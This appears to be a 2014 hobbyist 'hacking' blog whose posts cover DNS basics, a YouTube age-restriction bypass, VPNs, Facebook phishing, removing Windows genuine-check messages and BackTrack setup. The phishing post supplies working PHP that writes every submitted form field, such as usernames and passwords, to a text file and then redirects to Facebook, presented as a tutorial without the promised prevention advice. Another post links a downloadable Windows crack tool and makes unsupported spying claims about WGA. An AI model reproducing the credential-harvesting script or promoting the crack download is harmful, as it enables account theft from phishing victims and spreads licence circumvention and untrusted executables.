Saturday, 14 June 2014

DNS HACKING

>> DNS HACKING <<
1 DNS BASICS
2 RESOURCE RECORDS AND THE ZONE FILE
3 DNS LOOKUP AND  REVERSE  DNS  LOOKUP
4 DNS ZONE TRANSFER                  
5 WHY SECURITY ISSUE OF ZONE TRANSFERING
6 CONCLUSION


1          Dns Basics:- DNS converts human readable domain names into IP-addresses. This is because domain names are much easier to remember than IP-addresses. This process may take place through a local cache or through a zone file that is present on the server. A zone file is a file on the server that contains entries for different Resource Records (RR).
This  process can be  understand by this  example let’s assume  that  you write in  URL  bar of  browser “www.google.com”  the  this  query first  goes to DNS  server  their  resolve  the site  name  in Ip address and  then  goes  to  query for   web  page   of  google com  to  web. server.
                                                                                  It’s not  easy  task  to  remember every IP  address  of various  web site. so  there  DNS  resolver  work  to  resolve  website  name into  IP  address .
Ex. (Generally all people stored  phone  no.  by particular  person’s  name  )   .
                                                                                                                     

Wednesday, 30 April 2014

Bypass Age Restrictions On YouTube Videos.


you  want  to  watch video ever on  youtube  but couldn't  becuase it is age  restricted  and  may  be  you  have no  account  . so  this  article  will  teach you how  to  bypass restriction on youtube.


here  url  is  http://www.youtube.com/watch?v=MlPH_ycy62s

from here replace   watch?v=  by  v/  and  press enter

you have done it 

enjoy yourself :)

Thursday, 17 April 2014

WORKING AS ANNONYMOUS USING VPN ( virtual private network)..!




what is  vpn  and  how   is   it  usefull  ?

A virtual private network (VPN) extends a private network across a public  network, such as the internet. It enables a computer to send and receive data across shared or public networks as if it is directly connected to the private network, while benefiting from the functionality, security and management policies of the private network
Consumers use a private VPN service, also known as a VPN tunnel, to protect their online activity and identity. By using an anonymous VPN service, a user's Internet traffic and data remain encrypted which prevents eavesdroppers from sniffing Internet activity.  A VPN service is especially useful when accessing public wi-fi, hotspot because the public wireless services might not be secure. In addition to public Wi-Fi security, a private VPN service also provides consumers with uncensored Internet access and can help prevent data theft and unblock websites.



Monday, 14 April 2014

FACEBOOK account hack and prevention to hack. ....!(PHISHING METHOD)

Hi  guys,
              this  tutorial  is  only education purpose  today  i m going  to tell  you  how  to  hack  facebook  acount and   preventing  to  himself   be  victim  ..

what is  phising  ?
Phishing is the act of attempting to acquire sensitive  information such as usernames,passwords, and  credit cards details (and sometimes, indirectly money) by masquerading as a trustworthy entity in an electronic communication.

1. copy  the  following  code and  paste  in   notepad

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Thursday, 10 April 2014

REMOVING "WINDOWS IS NOT GENUINE".........!

hi guys,
              we use generally free available windows  o.s  and  after some days or months it show  the  "windows is not genuine  get  genuine  now"  with black  screen  .  It's  look  so irritable  and  today  i'll   explain  how  get remove this  message .......... :)


1. open  the cmd  "run as administrator"

2.and type " slmgr -rearm " (without quotation mark)

3.restart system  and u will find  there is not any message on  bottom corner of  monitor.........

**//this  trick  increase time  of  genuine  of  o.s  only  not permanent //**

so can use the  tool  "wga remover "..!

https://www.dropbox.com/s/hlpl1tsrunwy8wu/Windows%20Genuine%20Hack.zip

WGA tests the authenticity of Windows every day, collects and conveys data to Microsoft server even if according to all indications everything is ok with the license. In other words, its main task is of more spy character that consists in collecting of information behind your back.

take care enjoy  yourself..... :)

Tuesday, 8 April 2014

LOGIN GUI MODE WITHOUT "STARTX" IN BACKTRACK MACHINE..........!

1> open terminal  in bt(backtrack)
2> type " apt-gte install gdm"
3> type "vim /etc/rc.local" 

3>for  typing press "i"  and type /usr/sbin/gdm &


4> pres esc + : wq ( for write and quite)

note>:
**//remember to leave exit0 as the  last line  in /etc/rc.local  //**

5 > now  reboot  your bt machine



enjoy your self  :)


Running NETSETTER in backtrack machine .......!

Hi guys,
              we use the backtrack  o.s  in  virtual machine  and  use the  internet  by sharing internet from  main machine   but   when we want to  use  internet with real  ip   then  how  to  use  this  so  i  explain  in  following post ..... !


   first download  the  file  from this link ....
 http://www.mediafire.com/download/8j1jo2v4mnkx4gb/3gusbmodem

put this  file on desktop of  backtrack machine

open terminal  (ctrl+ alt + t) in backtrack 5r3

type
1> cd Desktop/
2> chmod a+x 3gusbmodem
3> ./3gusbmodem --interactive


 
 4> connetct with 3g
5> usb device
6>usb modem
7>reported by you modem
in this section requird  the apn  (acess point name )

i use the  reliance  sim  and  it's  apn  is  rcom 
8>typing your  own apn  name
you wil  get connected
 and  use the  internet with real ip


enjoy yourself ...... :)